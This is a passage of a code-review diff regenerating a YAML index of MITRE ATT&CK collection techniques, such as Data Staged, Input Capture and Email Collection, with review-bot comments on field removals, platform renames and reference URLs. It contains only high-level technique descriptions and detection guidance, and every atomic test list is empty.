+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
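Review bot: `x_mitre_attack_spec_version: 2.1.0` is dropped from T1560.002 at the top of this hunk without a `+` replacement, whereas the T1074.002 and T1557.003 hunks bump the field to 3.2.0; the same unreplaced removal appears for T1602.002 and T1185 below. Unless the generator re-emits the field elsewhere in those objects, they lose their ATT&CK spec version entirely, so please confirm the regenerated file still carries it. For the newly added T1557.004 block, `x_mitre_detection: ''` and `atomic_tests: []` are expected for a freshly indexed sub-technique with no atomic test yet; note that its `kill_chain_phases` list both credential-access and collection while this copy lands under the `collection` section, so a matching entry under credential-access should appear elsewhere in the generated index.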
@@ -40530,7 +41091,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -40560,8 +41121,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
@@ -40615,7 +41174,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40652,7 +41210,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40680,12 +41238,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40722,23 +41278,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -40771,21 +41327,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
@@ -40893,12 +41448,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40909,13 +41463,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40929,6 +41483,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40939,12 +41494,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40989,30 +41544,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -41022,31 +41558,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
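Review bot: `x_mitre_permissions_required: - User` is removed from T1213.001 (the two `-` lines after the data sources) with no replacement, and T1056 loses its four-entry `x_mitre_permissions_required` list further down, yet T1602.002's `x_mitre_permissions_required: - Administrator` survives as unchanged context earlier in the patch. ATT&CK retired that field, so the removals look like the index catching up with upstream; please confirm the retention on T1602.002 reflects what the source bundle still carries rather than an inconsistency in the generator. The `x_mitre_version` bump 1.0 to 1.1 correctly accompanies the description change that adds the Unsecured Credentials link, and the large `-` block of T1213.001 fields in the previous hunk is fully re-emitted here in the new key order, so no content is lost.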
@@ -41079,10 +41632,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41091,16 +41646,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
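Review bot: the platform list for T1114.003 replaces `Office 365` and `Google Workspace` with the single value `Office Suite` (T1114.002 gets the same change below). Any per-platform index or matrix that selects techniques by the literal strings `Office 365` or `Google Workspace` will silently drop both email-collection sub-techniques unless the generator maps `Office Suite` onto those platforms, so please check that every derived platform file in this PR was regenerated with the mapping in place. The `x_mitre_version` bump 1.3 to 1.4 and the new `Cloud Service: Cloud Service Metadata` data source are consistent with the upstream object.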
@@ -41132,70 +41688,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
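Review bot: this hunk rewrites T1074 wholesale, but the only content changes are the `modified` stamp, the Mandiant M-Trends URL (content.fireeye.com replaced by the mandiant.com PDF) and the spec version 2.1.0 to 3.2.0; everything else is key reordering into the generator's new order. It is worth stating in the PR that this order is the generator's stable output, so reviewers of future index diffs know to expect content-only changes, and worth a quick check that the new Mandiant URL resolves, since the old fireeye link is dropped outright rather than replaced with an archive snapshot as was done for the Lockstep reference on T1557.003.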
@@ -41268,7 +41820,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -41323,12 +41874,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41340,6 +41890,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -41347,11 +41900,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -41368,14 +41921,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -41391,6 +41941,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41399,13 +41950,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -41413,15 +41964,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -41432,9 +41979,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
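Review bot: the added T1213.004 block is internally consistent: all three citations in the description (`Bleeping Computer US Cellular Hack 2022`, `Bleeping Computer Mint Mobile Hack 2021`, `Bleeping Computer Bank Hack 2020`) have matching `external_references` entries, and `x_mitre_detection: ''` mirrors an upstream object that carries no detection text. For the T1056 tail at the top of this hunk, the removed `x_mitre_is_subtechnique: false` was already re-emitted as a `+` line in the earlier T1056 hunk, so the flag survives; the only net change for T1056 across its hunks is the spec version 3.1.0 to 3.2.0, the dropped `x_mitre_permissions_required` list and the added `revoked`/`x_mitre_deprecated` flags, which is what a regeneration from current data should produce.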
@@ -41480,7 +42078,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41499,37 +42097,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
